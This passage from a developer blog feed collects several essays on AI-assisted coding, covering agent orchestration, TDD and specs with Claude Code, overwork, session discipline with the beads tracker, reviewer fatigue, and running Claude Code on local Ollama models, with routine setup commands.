The hub coordinates. Workers execute in isolated worktrees. Tasks are beads with dependencies. No mail system, no witness layer, no convoy abstraction. If a worker finishes, the hub sees it in the dashboard. If a worker gets stuck, you look at the terminal. No intermediate monitoring agent needed.

The key difference:wt is a pluggable orchestrator. Each project gets its own config — yolo mode for prototypes (no tests, auto-merge, maximum speed), strict mode for production code (tests required, PR review, quality gates), or anything in between. Gas Town is one-size-fits-all. Real projects aren’t.

It’s early. But two weeks of wrestling Gas Town gave me the blueprint for what comes next.

What I’m Taking Away

Gas Town is a research prototype that got released into the wild. Steve warned people. I didn’t listen.

But I don’t regret it. Two weeks of wrestling gave me clarity about what agent orchestration actually needs:

Beads (or equivalent) is non-negotiable. Git-backed task tracking with dependencies is the foundation. Without it, agents have no memory across sessions.
Worktree isolation is the right primitive. One agent, one worktree, no conflicts. Simple and correct.
The hub/worker model works — if the hub is smart. The dispatcher problem is the real unsolved challenge. Manual dispatch defeats the purpose.
Simplicity beats power. Three concepts (hub, worker, task) cover 90% of the use cases. Ten concepts with Mad Max names cover 95% but cost you 5x the cognitive overhead.
Your laptop has limits. Two to three concurrent workers is practical on a MacBook. Six is aspirational. Twenty is a data center problem.

Steve Yegge is doing genuinely new work here. Nobody else has shipped a multi-agent orchestrator for Claude Code with this level of ambition. The HN comment that stuck with me: “Gas Town is cackling mad laughter from someone both insane and prescient simultaneously. Today it’s insane. But expect serious versions in the future informed by these early experiments.”

I broke the first rule. I’d do it again. Just maybe with fewer polecats next time.

]]>

Software Engineering Is Dead, or Is It?

Lakshmi Narasimhan — Tue, 27 Jan 2026 00:00:00 +0000

Everyone said agentic coding would kill software engineering discipline. Turns out it killed thewrong disciplines.

Clean code?Dead. Nobody’s hand-crafting variable names when Claude generates 500 lines in 30 seconds. But TDD, specs-driven development, domain-driven design — the stuff we used to skip because it felt like ceremony? That’s the load-bearing wall now. Tear it out and the whole thing collapses.

TDD: The Cache That Wasn’t

I had Claude Code build me a Redis caching module. Proper TTLs. Cache invalidation on writes. Unit tests passing. Beautiful, elegant, chef’s-kiss code.

One problem. The actual query functions never called the caching layer.

Hundreds of requests later, I checked Redis. Empty. A pristine, untouched Redis instance, sitting there like a museum exhibit.I’ve written about these failure patterns before — this one hurt the most.

Integration tests would have caught it. But only if I’d written themfirst. That’s the part everyone skips — writing the verification before the implementation. TDD forces you to define “done” before the agent starts building. Without it, you get beautiful isolated components that nobody wired together.

This isn’t hypothetical. An r/programming thread (894 upvotes) nailed it: “We’re getting correct code, but not right code.” One reviewer found AI-generated Java using the default ForkJoinPool for I/O-bound tasks. Compiles fine. Passes unit tests. Catastrophic under load.

My favorite was the “chief architect” who generated “full coverage” unit tests with Copilot. Duplicate asserts. Unused service constructions. Tests that passed but tested nothing. A green CI pipeline that was essentially a participation trophy.

TDD isn’t ceremony anymore. It’s the spec your agent actually follows.

Specs-Driven Development: The Authentication Amnesia

I spent two weeks pair-programming authentication with Claude Code. We tracked race conditions together. Debated RS256 vs HS256. Built a shared understanding of every edge case.

Then compaction hit.

“Where did we leave off?”

“I don’t have information about previous sessions.”

Two weeks of context. Gone. MyTODO.md became a graveyard of cryptic notes that made sense to exactly nobody, including me three days later.I wrote the full horror story here.

So I started using a git-backed issue tracker with dependency graphs that persists across agent sessions. Sprints and epics stopped being PM ceremony and became the agent’s memory. The control plane for multi-session work.

The pattern scales beyond my personal disasters. An r/programming post titled “The era of AI slop cleanup has begun” (4,200 upvotes) described a freelancer who keeps getting hired to fix AI-generated codebases. “It mostly works, but does so terribly.” The missing ingredient every single time: no structured planning, no phased delivery. Just vibes and a prompt.

Fred Brooks said it decades ago, and r/ExperiencedDevs rediscovered it (1,400 upvotes): “Once requirements are fully expressed, their information content is fixed. You can change surface syntax, but you can’t compress semantics.”

You can’t skip the thinking. You can only skip writing it down — and then you pay for it later when your agent wakes up with amnesia.

DDD: The Firewall Agents Can’t Generate

Here’s aReddit thread that lives in my head rent-free. Someone described the “Phantom Author” problem — only domain experts catch the subtle flaws agents produce. The code compiles. The tests pass. The logic is plausible. But it’swrong in ways only someone who understands the domain would notice.

The punchline: “Ironically the only people who should be using AI are people who are already experts.”

Bounded contexts — the core DDD concept — are the firewall. They tell the agent where one domain ends and another begins. Without that modeling, agents connect everything to everything. Your billing module knows about your notification preferences. Your auth layer has opinions about your recommendation engine.

Agents can’t generate domain boundaries because domain boundaries come from understanding the business, not the code. That’s your job. The agent’s job is everything inside the boundary.

The Punchline

The disciplines that survived aren’t the ones that made code pretty. They’re the ones that tame complexity.

TDD tells the agent what “done” means. Specs give it memory across sessions. DDD gives it boundaries it can’t infer on its own.

We didn’t need less engineering discipline. We neededdifferent engineering discipline. The ceremony is dead. The structure is mandatory.

]]>

The AI Productivity Paradox: Why I'm Working More Than Ever

Lakshmi Narasimhan — Mon, 26 Jan 2026 00:00:00 +0000

I had a conversation with a friend last week that I can’t stop thinking about.

We were comparing notes on hitting usage limits with AI coding tools. Both of us on expensive plans. Both of us running into ceilings more often than we did months ago. Both of us, apparently, turning into “power users” in our respective tiers.

And then he dropped this line: “So AI was supposed to make us work less but now we are working more. That’s the conclusion.”

I laughed. Then I stopped laughing.

Because he’s right. I get more done in a single day than I used to accomplish in a week. I’m shipping features, writing content, running experiments at a pace that would’ve been unthinkable about a year ago.

And I have never worked this much in my life.

Here’s what nobody warned us about: AI didn’t give us more time. It gave us more capability.

And capability, it turns out, is extremely addictive.

The Collapse of Activation Energy

Before AI coding assistants, most ideas died a quiet death in my notes app. Not because they were bad ideas. Because the effort-to-value ratio was unfavorable.

“I could build that feature, but it would take a week of focused work. Is it worth a week? Probably not.”

Idea archived. Moving on.

Now that same feature takes a day. Sometimes less. So I build it.

Then I build the next thing. And the next. And suddenly I’m shipping more in a month than I used to ship in a quarter.

The activation energy for starting new work collapsed. And I filled every inch of the newly available space.

Ambition Scales With Output

Here’s the thing about humans: we don’t scope our ambitions in absolute terms. We scope them relative to what feels achievable.

Before AI, I planned projects based on what I could reasonably ship with my limited time and energy. A feature per week. Maybe two if I was focused.

Now “reasonable” means something entirely different. My mental model of what’s achievable expanded by 5x, and my project scope expanded right along with it.

I’m not doing the same work faster. I’m doingmore work.

The goalposts moved. And I moved them myself.

The Death of Natural Stopping Points

There used to be friction in development work. Waiting for builds. Context switching costs. The mental load of holding an entire system in your head while debugging.

That friction was annoying. It was also a circuit breaker.

It forced breaks. It created natural pauses where you’d step away, get coffee, maybe realize it was 7pm and you should probably eat dinner.

AI removed the friction. Which sounds great until you realize the friction was also your automatic brake pedal.

Now you can go from idea to implementation to deployment without ever hitting a natural stopping point. The only thing that stops you is your own willpower.

My willpower, for the record, is not great.

The Dopamine Loop of Shipping

Here’s an uncomfortable comparison: AI-assisted coding feels a lot like infinite scroll.

You ship something. It feels good. The tool makes shipping fast and easy. So you ship something else. That also feels good. And there’s always one more thing you could ship.

Same psychological mechanics. Different output.

Except instead of consuming content, you’re producing it. Which feels more virtuous. Which makes it even harder to stop.

“I’m not doomscrolling. I’m beingproductive.”

Sure you are.

The “Why Not” Threshold

The most insidious change is what happened to my internal cost-benefit calculator.

I used to ask: “Is this worth the effort?”

Now I ask: “Why wouldn’t I just do this?”

That experiment I would’ve skipped because setting it up was tedious? Now I run it. That edge case I would’ve ignored because fixing it properly would take half a day? Now I fix it.

The threshold for “worth my time” dropped to near zero. So everything is worth my time. So I do everything.

This is how you end up working 12-hour days while technically being more “efficient” than ever before.

The Uncomfortable Truth

AI tools didn’t give us more free time. They gave us more output capacity. And we’re psychologically incapable of leaving capacity unused. At least I am.

The work expanded to fill the available capability. Parkinson’s Law, but in reverse.

We’re not working less. We’re shipping more whilefeeling productive. Which is a different thing entirely.

My friend was right to put “off” in scare quotes when wishing me a good weekend. We both knew I wasn’t really taking time off. I was just switching to a different kind of work.

What Now?

I don’t have a tidy solution here. I’m not going to pretend I’ve figured out work-life balance in the age of AI assistants.

But I’ve started noticing when I’m filling capacity just because I can. When I’m starting a new feature not because it matters, but because the activation energy is so low that “why not” won the argument.

Sometimes the answer to “why not” is: because you could just… not.

Groundbreaking insight, I realize.

The AI isn’t going to set boundaries for you. If anything, hitting usage limits might be the only forced break some of us get. Which is both sad and a little funny.

Maybe the real productivity hack is learning to leave capability on the table.

I’ll let you know how that goes. Right after I ship this one more thing.

I write about building and deploying software as a solo developer. If you’re trying to do it all yourself without hiring a team, I’m probably making the same mistakes you are.

]]>

I Built 2 SaaS Products Vibe Coding. Here's the System That Made It Work.

Lakshmi Narasimhan — Sat, 24 Jan 2026 00:00:00 +0000

Gene Kim and Steve Yegge’sVibe Coding book says you’re the head chef now.

The metaphor runs through the whole thing: you’re not a line cook anymore, you’re orchestrating AI sous chefs, directing the kitchen, tasting every dish before it goes out. The developer-as-implementer era is over. Welcome to developer-as-orchestrator.

The Biryani Incident

It’s a good metaphor. I buy it. But here’s the thing about being a head chef that the metaphor doesn’t quite capture: a head chef without mise en place is just a guy having a panic attack near hot surfaces.

I know this because I’ve been that guy. Literally.

My wife had to leave town for a few days. “I’ll handle dinner,” I said, with the confidence of someone who has watched many cooking videos and successfully boiled pasta multiple times. I decided to make veg biryani — a dish my wife makes effortlessly, layering rice and vegetables and spices into something that tastes like it required more effort than it actually did.

“Prep everything first,” she told me before leaving. “Soak the basmati rice. Marinate the paneer. Chop the vegetables for layering. Have it all ready before you start cooking.”

Reader, I did not do this.

I started frying onions. While the onions were going, I realized I hadn’t marinated the paneer. So I started cubing paneer and mixing yogurt and spices. Then the onions started burning. I ran back, stirred frantically, ran back to the paneer. Remembered I needed to soak the basmati. Started the rice soaking. The onions were now definitely burned. I scraped them out, started over, but now I was behind, so I tried to do the vegetables and the new onions simultaneously while the paneer sat half-marinated…

An hour later I had a kitchen that looked like a crime scene, three pans with various stages of failure in them, and something that was technically edible but bore no resemblance to biryani. My wife, via video call, watched me plate this disaster with the expression of someone who had specifically warned against this exact outcome.

The problem wasn’t skill. I can cook. The problem was that prep and execution were bleeding into each other. I was trying to figure out what I needed while also doing the thing. And it turns out you can’t actually do both. Not well, anyway.

I’ve been that guy with AI sous chefs too.

I’ve been vibe coding since mid-2025. By “vibe coding” I mean the thing where you describe what you want in natural language and an AI writes the code. You know, the future we were promised, except the future has some sharp edges nobody mentioned in the demos.

Two SaaS products. Real users. Real revenue. Not toy projects, not “look ma I generated a todo app” tutorials, not the kind of thing you show off on Twitter and then quietly delete three weeks later. Actual products that people pay actual money for.

So when I tell you what follows, understand: this isn’t theory. This is what I learned by shipping real things and watching everything that could go wrong go wrong.

The Markdown Hemorrhage

For the first few months, I was that chef.

I’d sit down to implement a feature. Claude and I would get rolling. Then I’d notice a bug. Well, I’m already here, might as well fix the bug. Then while fixing the bug, I’d realize the error handling was inconsistent. Better clean that up. Oh, and there’s still context left in the window — might as well tackle that other feature I’ve been meaning to add.

Two hours later: three half-finished things, Claude confused about which task we’re actually doing, and code quality somewhere between “works” and “I’m not sure why.”

And the markdown. God, the markdown.

Claude, bless its heart, wanted to help me remember things. So it started creating files.ARCHITECTURE.md.DECISIONS.md. IMPLEMENTATION_NOTES.md.TODO.md.CONTEXT.md.CHANGELOG.md. README_UPDATED.md.

I call this markdown hemorrhage. The AI equivalent of a kitchen where every surface is covered with prep bowls, half-chopped vegetables, and sticky notes that say “DON’T FORGET THE SAUCE” — technically documentation, practically chaos.

At one point I had so many markdown files that I needed another AI tool just to search through the documentation I’d created for my AI tool.

This was clearly insane.

But here’s the thing that took me embarrassingly long to figure out: the problem wasn’t the tools. The problem was me.

One Goal Per Session

I was treating every Claude session like a buffet.

You know how it goes. You sit down to implement a feature. While you’re implementing, you notice a bug. Well, you’re already here, might as well fix the bug. Oh, and while fixing the bug, you realize the error handling is inconsistent across the codebase. Better clean that up too. And hey, there’s still context left in the window — might as well tackle that other feature you’ve been meaning to add.

Two hours later, you’ve got three half-finished things, Claude is confused about which task it’s actually working on, and the code quality has degraded to “works but I’m not sure why.”

I call this context pollution. And once I named it, I started seeing it everywhere.

LLMs are bad at juggling multiple goals. This isn’t a Claude problem — it’s a fundamental thing about how these models work. When you ask them to hold multiple objectives simultaneously, they get worse at all of them. Not a little worse.Dramatically worse.

The fix sounds almost stupidly simple: one goal per session.

That’s it. That’s the whole trick. One goal. One session. If you discover a bug while implementing a feature, you write down the bug and you close the session. The bug gets its own session later. No “while I’m here” detours. No context pollution.

“But what about efficiency?” I hear you asking. “Isn’t it wasteful to end a session when there’s still context left?”

This is the trap. This is exactly the thinking that leads to burned onions and half-marinated paneer. The leftover context is not an asset. It’s a liability. It’s your coworker with three tasks open, doing all of them poorly, about to forget everything anyway.

End the session. Start fresh. One goal.

The Mise en Place

Now, this discipline only works if you have a way to track what you’re not doing.

If you end a session every time you discover a bug, you need somewhere for that bug to live. Otherwise you’ll forget it. The bugs pile up in your head, you context-switch mentally, and you’re back where you started.

This is where beads comes in.

Beads is a git-backed issue tracker that Claude can read and write. Steve Yegge built it (yes, that Steve Yegge — the guy who wrote the platforms rant and approximately nine million words about Emacs). The idea is simple: every task becomes a “bead.” Claude creates them, updates them, closes them. They survive compaction. They sync through git.

I installed it. I ranbd init. And then something clicked.

See, beads isn’t just a todo list. It’s a forcing function. When you start a session, you runbd ready and it shows you what’s available to work on. You pickone. Not three. One.

And when you discover a bug mid-session? You tell Claude to create a bead for it. Claude writes it down, logs the context, notes any relevant details. Then you move on. The bug exists now. It has a home. You don’t have to hold it in your head.

The discipline and the tool reinforce each other. One bead per session only works because beads exist to capture everything else. And beads only work because the discipline prevents you from drowning in them.

Grooming vs. Coding

But I’m getting ahead of myself. Let me tell you about grooming.

In my old workflow, I’d sit down and just… start. Open Claude, describe what I wanted, begin coding. Very vibe. Very chaotic. Whatever felt right in the moment.

The problem is that “figuring out what to do” and “doing the thing” are completely different cognitive modes. One is divergent — you’re exploring possibilities, breaking down problems, identifying edge cases. The other is convergent — you’re executing, making decisions, writing code.

When you mix them, you get mush.

So now I run two types of sessions:

Grooming sessions are for thinking. I’m not coding. I’m not even planning to code in this session. I’m creating beads. Breaking down a feature into pieces. Identifying dependencies. Noting edge cases. If I think of an unrelated feature while grooming, it gets written down — for a different grooming session. No cross-contamination.

Coding sessions are for execution. One bead. Implement it. If I discover a bug, I note it and keep going unless it’s blocking. The bug gets groomed and coded in its own sessions later.

This separation is the whole game. It sounds bureaucratic. It sounds like exactly the kind of process that “vibe coding” was supposed to eliminate. But here’s the secret: this discipline is what makes vibe coding actually work at scale. Without it, you’re just generating code and hoping. With it, you’re building systems.

A Few Other Things

MCPs should be loaded at project level, not globally. Every MCP eats context. If a project doesn’t need the Reddit MCP, it doesn’t get the Reddit MCP. Context is expensive. Guard it like it’s money, because in a very real sense, it is.

Autocompact should be off. I want to control when context resets, not have the algorithm decide for me mid-feature. Yes, this means manually managing sessions. That’s the point.

Claude.md files are more powerful than you think. I have a global one in~/.claude/CLAUDE.md with rules that apply everywhere. Each project gets its own with project-specific instructions. Claude reads these automatically. They’re like a pre-prompt that doesn’t eat your context window.

What Still Doesn’t Work

Now, here’s the part where I’m supposed to tell you it’s all solved and my workflow is perfect.

It’s not.

Debugging production issues is still clunky. I’ve got a combination of skills and MCPs that sort of works, but there’s too much manual context assembly. Something breaks in prod and I’m still spending the first 20 minutes of the session explaining the architecture before we can even start diagnosing.

Test-driven development doesn’t flow. The loop of “write test, see it fail, implement, see it pass” — it’s awkward. Claude wants to write everything at once. I’m still tweaking my tooling to make TDD feel natural.

UX work is hard. Like, fundamentally hard. Claude can scaffold UI. It can generate components. But “does this feel right?” is a human judgment call, and trying to get there through text-based iteration is like describing a painting to someone and asking them to tell you if it’s beautiful.

These are the walls I’m hitting. I’m building tooling to address them — anagent orchestrator that tailors Claude to my specific workflow. Work in progress. If you’re the adventurous type, you cantry it now.

The System

So here’s the actual system, if you want to try it:

Install beads:npm install -g @anthropic-ai/beads && bd init
Add to your globalCLAUDE.md: “Checkbd ready at session start. One bead per session.”
Separate grooming from coding. Different sessions. Different mindsets.
Resist the urge to “do more while there’s context left.” That’s the trap.
Protect your context. Project-level MCPs only. Kill anything you don’t need.

Two SaaS products since mid-2025. All vibe coded with this system.

Not because the tools are magic. The tools are good, but tools are never magic. What made it work was the discipline — the willingness to be a little bit boring about context hygiene, to resist the temptation to do more, to trust that a focused session ships more than a scattered one.

Vibe coding without chaos. It turns out it’s not about vibing harder. It’s about vibing deliberately.

You’re the head chef now. But don’t forget your mise en place.

My wife was right, by the way. She usually is.

I’m Lakshmi. 20 years in software — ops, infrastructure, full-stack. Now solo founder using Claude Code to develop, deploy, and distribute.

]]>

Congratulations, You've Been Promoted to Code Janitor

Lakshmi Narasimhan — Fri, 23 Jan 2026 00:00:00 +0000

It was 2001. I was building a platformer.

Not “building” in the modern sense, where you describe what you want and a language model hallucinates it into existence. I meanbuilding. DJGPP. Allegro. A DOS compiler that ran on Windows 98 and made you feel like a wizard for getting it to work at all.

I spent three weeks figuring out how platform scrolling worked.

Three weeks. Not because I was stupid — though jury’s still out — but because nobody had written a Medium article explaining it. Stack Overflow didn’t exist. The Allegro documentation was a text file that assumed you already knew what a framebuffer was. I had tothink.

And then one night, around 2am, I got it working.

My little sprite — a 16x16 pixel abomination that was supposed to be a knight but looked more like a confused rectangle — walked across the screen. I pressed the arrow keys and the platform scrolled. The background moved. The character stayed centred.

I decided, right then, that I wanted to be a game programmer.

(I didn’t become a game programmer. Life had other plans. But that’s not the point.)

The point is: I remember that moment with perfect clarity. The dopamine hit. The sense ofcreation. I had figured something out. I had made something move. I understood, down to the register level, why it worked.

I couldn’t tell you the last time I felt that.

The Joy We Traded

There’s a thread on r/ClaudeAI that’s been haunting me. 624 upvotes. Title: “We are not developers anymore, we are reviewers.”

The author nails it:

“Coding used to be a creative act. You enter a ‘flow state,’ solving micro-problems and building something from nothing. Now, the workflow is: Prompt → Generate → Read Code → Fix Code. We have effectively turned the job into an endless Code Review session.”

And then the kicker:

“Let’s be honest, code review has always been the most tedious part of the job.”

Yeah. That landed.

I used to joke that the worst part of being a senior engineer was reviewing other people’s code. All the cognitive load of understanding a system, none of the satisfaction of building it. You’re not creating — you’re auditing. You’re the IRS of software development.

Congratulations. That’s your whole job now.

The Janitor Effect

One commenter called it the “reverse centaur.”

The dream was that AI would be the centaur’s horse — we’d ride it, directing its power, multiplying our capabilities. We’d be the brains, it’d be the muscle.

Instead, we’re the cleanup crew.

Claude writes 400 lines of code in 30 seconds. Impressive. Looks right. Probably compiles. But there’s a subtle bug on line 247 where it’s comparing a string to an integer in a way that JavaScript will happily accept and silently mangle. There’s a race condition in the async handler that only manifests under load. There’s a variable nameddata that shadows another variable nameddata three scopes up.

You know. Junior developer stuff.

Except this junior developer types at 10,000 words per minute and never gets tired. So now you’re reviewing 10x more code per day, and every review requires you to maintain the mental context of codeyou didn’t write.

I spent 20 years building mental maps of codebases. Line by line. Function by function. When you write the code yourself, the map builds automatically. You know why that flag exists because you added it at 3am to fix a production incident. You know that module is haunted because you were there when the haunting began.

When Claude writes the code, you get none of that. You just get the artifact. A fully-formed thing that appeared, Athena-like, from the forehead of a language model. And you have to reverse-engineer the intent from the implementation.

This is debugging someone else’s code.

Forever.

The Uncomfortable Truth

Here’s what nobody wants to say out loud: the implementation was the fun part.

Not the architecture. Architecture is meetings. Architecture is diagrams that nobody reads and Jira tickets that nobody updates. Architecture is important, yes, but it’s notfun.

The fun was the 2am breakthrough. The fun was that moment when the tests finally pass and you understandwhy. The fun was the flow state — that hypnotic trance where hours feel like minutes and you emerge, blinking, having built something that didn’t exist before.

LLMs took that part.

They left us the meetings.

The “Promoted to Manager” Cope

There’s a certain cope that shows up in these discussions. “Well, actually, you’ve been promoted! Now you’re like a tech lead! You’re directing instead of doing!”

Sure. And my 2001 self was “promoted” from game programmer to accountant the moment Excel learned formulas.

Here’s the thing about being promoted: you’re supposed towant it. The tech leads I know who love their jobs? They love mentoring. They love the big-picture thinking. They love watching junior devs grow.

Nobody loves reviewing AI-generated code. The AI doesn’t grow. It doesn’t learn from your feedback. It just generates more code for you to review tomorrow. You’re not mentoring — you’re babysitting. And the baby has unlimited energy and zero object permanence.

What We Actually Lost

Let me be clear: I’m not a Luddite. The productivity gains are real. I ship faster than ever. I build things in hours that would have taken weeks.

But something shifted.

When I built that platformer in 2001, I was a craftsman. Slow, inefficient, probably writing terrible code — but a craftsman. I understood my tools. I understood my materials. I understood, deeply, what I was making.

Now I’m a project manager for a very fast, very unreliable contractor.

The contractor doesn’t care about the code. It has no pride in the work. It optimizes for “looks plausible” rather than “is correct.” It will happily generate the same bug in 15 different files if you don’t catch it in the first one.

And catching it isyour job now. Not building. Catching.

The Question Nobody Wants to Answer

The Reddit thread ends with a question:

“Do you miss the actual act of coding, or are you happy to just be the ‘director’ while the AI does the acting?”

I think about my 2001 self. That kid who spent three weeks understanding platform scrolling. Who felt genuine joy when a rectangle moved across a screen.

Would I trade that experience for “just ask Claude to make a platformer”?

I honestly don’t know.

But I know this: that kid would be horrified by how I work today. Not impressed — horrified. Because to him, the codingwas the point. The game was just an excuse to code.

And now the code is just an excuse to ship.

The Adaptation

Look, I don’t have a tidy conclusion here. The models aren’t getting worse. The productivity isn’t going away. We’re not going back to DJGPP and Allegro and three-week debugging sessions.

Maybe the joy comes back in a different form. Maybe it’s in the architecture, once we learn to love it. Maybe it’s in building the tools that build the tools. Maybe it’s in the meta-game of prompt engineering and workflow optimization.

Or maybe we just mourn quietly and move on.

I’ve gotten good at code review. I’ve built mental models for reading AI-generated code quickly, spotting the common failure modes, knowing where to look for the bugs. It’s a skill. Not the skill I wanted, but a skill.

And sometimes — rarely, but sometimes — I still drop into the code myself. Ignore Claude. Write it by hand. Feel the flow state kick in, just for a moment.

It’s slower. It’s inefficient. It’s probably a waste of time.

But that little rectangle still needs to walk across the screen sometimes. Even if nobody’s watching.

]]>

Why Company AI Bans Will Backfire (The Napster Lesson)

Lakshmi Narasimhan — Thu, 22 Jan 2026 00:00:00 +0000

In 1999, a college kid named Shawn Fanning released a little program called Napster.

Within 18 months, 80 million people were using it. The record industry lost its collective mind. Metallica sued. Dr. Dre sued. The RIAA launched a legal crusade that would make Prohibition-era feds proud.

In July 2001, Napster was ordered to shut down.

Victory for the record labels, right? Piracy defeated. Order restored.

Except that’s not what happened at all.

What happened was Kazaa. And LimeWire. And BitTorrent. And The Pirate Bay. The music industry spent the next decade playing whack-a-mole with increasingly sophisticated piracy networks. They sued college students for thousands of dollars. They installed rootkits on CDs. They lobbied for laws that made sharing a song punishable by more jail time than armed robbery in some states.

None of it worked.

People didn’t stop downloading music. They just got better at hiding it. The tools got more decentralized, more anonymous, more impossible to shut down. Every crackdown spawned three new services. The industry’s own enforcement efforts trained an entire generation to view them as the enemy.

The thing that finally fixed music piracy wasn’t lawsuits or legislation or DRM. It was Spotify. It was giving people a legitimate way to do the thing they were going to do anyway, at a price point that made piracy feel like more effort than it was worth.

The music industry spent a decade fighting human behavior. Then someone finally figured out how to work with it instead.

I keep thinking about this story lately.

The email that started a Reddit war.

A developer posted recently: “My company banned AI tools and I don’t know what to do.”

Security team sent an email. No ChatGPT. No Claude. No Copilot. No automation platforms with LLMs. Data privacy concerns. Their reasoning wasn’t entirely wrong — they work with sensitive client information.

But here’s the part that made 114 people upvote and 392 people comment:

“Some people on my team are definitely using AI anyway on personal devices. Nobody talks about it but you can tell.”

Read that again.

The ban didn’t stop AI usage. It just pushed it underground. Developers are now typing company code into free-tier tools on personal phones with zero audit trail, zero data retention policies, zero corporate oversight.

The policy designed to prevent data leakage created the exact conditions for data leakage to happen.

Sound familiar?

We’ve seen this movie before.

The Napster pattern shows up everywhere once you start looking.

Prohibition didn’t stop drinking. It created speakeasies and bootleggers and gave organized crime its business model for the next century.

Corporate social media bans don’t stop employees from checking Twitter. They just do it on their phones instead of their work computers — which, ironically, means IT has even less visibility into what’s happening.

VPN blocks in authoritarian countries don’t stop people from accessing banned sites. They just create a thriving market for better VPN services.

The pattern is always the same: Ban the thing people want to do. Watch them do it anyway, but worse. Spend enormous resources trying to enforce the unenforceable. Eventually give up or get disrupted by someone who figured out how to make the thing legal and convenient.

The music industry got Spotify. The question is: what’s the Spotify for AI-banned developers?

The escape hatch nobody’s talking about.

Here’s where this gets interesting.

Buried in a comment on that Reddit thread, someone wrote: “Welcome to local llama.”

Most developers scrolled past it. But that two-word comment is actually the whole answer.

You can run Claude Code — the actual Anthropic CLI tool — with local models. Everything stays on your machine. Nothing touches the cloud. Zero API costs. Full compliance. Your security team can’t complain about data leaving the network when the data never leaves your laptop.

This became possible a few months ago when Ollama added native support for the Anthropic Messages API. Two environment variables and you’re running.

export ANTHROPIC_BASE_URL="http://localhost:11434"
export ANTHROPIC_AUTH_TOKEN="ollama"

That’s it. That’s the whole trick.

Your company banned Claude? Cool. Run Claude Code pointed at a local model. The interface is identical. The workflow is identical. The data stays on hardware you control.

This isn’t a hack or a workaround. It’s a legitimate, auditable, IT-approved way to use AI coding tools without sending a single byte to external servers.

The Spotify moment for AI bans.

Think about what Spotify actually solved.

People wanted music. The industry wanted control. Spotify gave people convenient access while giving the industry a revenue stream and usage data. Everyone got something.

Local AI models are the same deal.

Developers want AI assistance. Security teams want data privacy. Local models give developers the tooling while giving security teams complete control over where the data goes.

For organizations, you can even run Ollama on a beefy internal server and point everyone’s Claude Code at it:

export ANTHROPIC_BASE_URL="http://internal-server.yourcompany.com:11434"

Now you’ve got a compliant, auditable, centrally-managed AI coding assistant. IT controls the models. IT controls the access. Everything is logged. Nothing leaves the network.

The security team gets their audit trail. Developers stop pretending they’re coding like it’s 2020. Everyone can have honest conversations in standups instead of maintaining an elaborate fiction.

The honest trade-off.

I’d be lying if I said local models were just as good as Claude’s API.

They’re not. Expect about 60-70% of the Claude experience. Local models need more explicit prompting. Complex multi-file refactors require more hand-holding. The magic “it just works” feeling of Claude Sonnet isn’t quite there yet.

One developer put it bluntly: “Claude Code talked to Ollama, and Qwen3-Coder produced some code. It was clumsy, slow, and required detailed prompting to make something work.”

But here’s the thing about that 60-70%: it’s 60-70% more than zero.

If your choice is between “banned from AI entirely” and “AI that’s pretty good but not magical,” that’s not actually a hard choice. You’re not comparing local models to Claude’s API. You’re comparing local models to doing everything manually while your competitors ship twice as fast.

The gap between local and cloud is real but shrinking. Six months ago this setup wasn’t even possible. The models are getting better every few weeks. By the time your company’s “we’ll revisit the AI policy later” actually happens, local models might be good enough that you don’t even want to switch.

The ten-minute setup.

If you want to try this:

# Install Ollama
brew install ollama
# Start it and pull a model
ollama serve
ollama pull qwen3-coder:32b
# Add to your ~/.zshrc
export ANTHROPIC_BASE_URL="http://localhost:11434"
export ANTHROPIC_AUTH_TOKEN="ollama"
export CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC=1
# Reload and run
source ~/.zshrc
claude

One gotcha: Claude Code’s system prompt is about 16,500 tokens. You need models with at least 32K context. Qwen3-Coder 32B and DeepSeek Coder V2 work well. Smaller models will choke before you even ask a question.

If you’re on an M-series Mac with 64GB RAM, you’re in good shape. 32GB is workable. 16GB is going to hurt.

The point of all this.

The Napster story didn’t end with piracy winning. It ended with the industry finally building something that worked with human nature instead of against it.

Your company’s AI ban is the RIAA lawsuit phase. It feels like control. It’s actually just delaying the inevitable while making everything worse in the meantime.

Local models are the Spotify phase. They’re the legitimate path that gives everyone what they actually want.

The technology exists. The setup takes ten minutes. The trade-offs are reasonable. The only question is whether your organization figures this out now, or burns another year pretending the ban is working while developers type code into ChatGPT on their phones.

History suggests they’ll figure it out eventually.

You don’t have to wait.

]]>

Your Code Quality Doesn't Matter Anymore (And It Never Did)

Lakshmi Narasimhan — Wed, 21 Jan 2026 00:00:00 +0000

A founder on Reddit recently shared that his CTO rebuilt what four third-party partners were providing — using Claude, in weeks, at a fraction of the cost.

Another commenter chimed in: their company replaced $300,000/year software with something they built in-house in under four months.

Meanwhile, over on r/SaasDevelopers, a developer is stuck at $200 MRR for eight months. Beautiful code. Great UX. Fifteen features. Asked where his users come from: “Uh, Product Hunt six months ago and some Reddit posts.”

These two conversations are happening in parallel across the internet, and most developers haven’t connected the dots yet.

Here’s what’s actually happening: AI didn’t just make coding faster. It vaporized the feature moat entirely.

The feature moat was always a lie we told ourselves.

“If I build it better, they will come.” This was comforting. It meant the thing we’re good at — writing code — was the thing that mattered most.

It wasn’t true before AI. It’s aggressively not true now.

Your competitor can rebuild your core features in a weekend. Not because they’re brilliant. Because Claude is sitting right there, and the barrier to “good enough” has collapsed to basically zero. That integration you spent three months perfecting? Someone’s CTO just shipped an 80% version while you were reading this paragraph.

The YC thread frames it well: “AI mostly kills thin feature moats, not real businesses.” If your entire value proposition is “we built this thing and it works,” congratulations — you’ve built something anyone can now replicate before their coffee gets cold.

So what’s actually defensible?

The comments in both threads converge on the same uncomfortable answer: everything except the code.

Distribution. The SaasDevelopers post makes the case bluntly: a mediocre product with great distribution beats a great product with no distribution. Every time. The OP claims $4.8K MRR with “decent features, nothing groundbreaking” because he publishes three SEO posts weekly and engages in five communities daily. His previous products had better code and failed under $500 MRR.

Whether you believe his specific numbers or not, the pattern is real. Visibility compounds. Code quality doesn’t.

Operational complexity. The YC founder pivoted to payments specifically because it’s “harder to clone with AI.” Payments involve regulatory mess, edge cases that actually hurt people when you get them wrong, and trust that takes years to build. You can’t vibe-code your way to PCI compliance.

Workflow embedding. One commenter nailed it: “Can a copycat ship it, but still not get adopted because switching costs and trust are the real barrier?” If yes, you might have something. If your product is a nice UI on top of an API call, you’re a feature waiting to be absorbed.

Data that compounds. This one’s subtle but important. If your product gets better because you have data your competitors can’t easily replicate — user behavior, domain-specific training data, network effects — that’s a moat AI can’t trivially cross.

The developer’s existential crisis.

Here’s the part nobody wants to say out loud: for most technical founders, the skill that got them here is now table stakes.

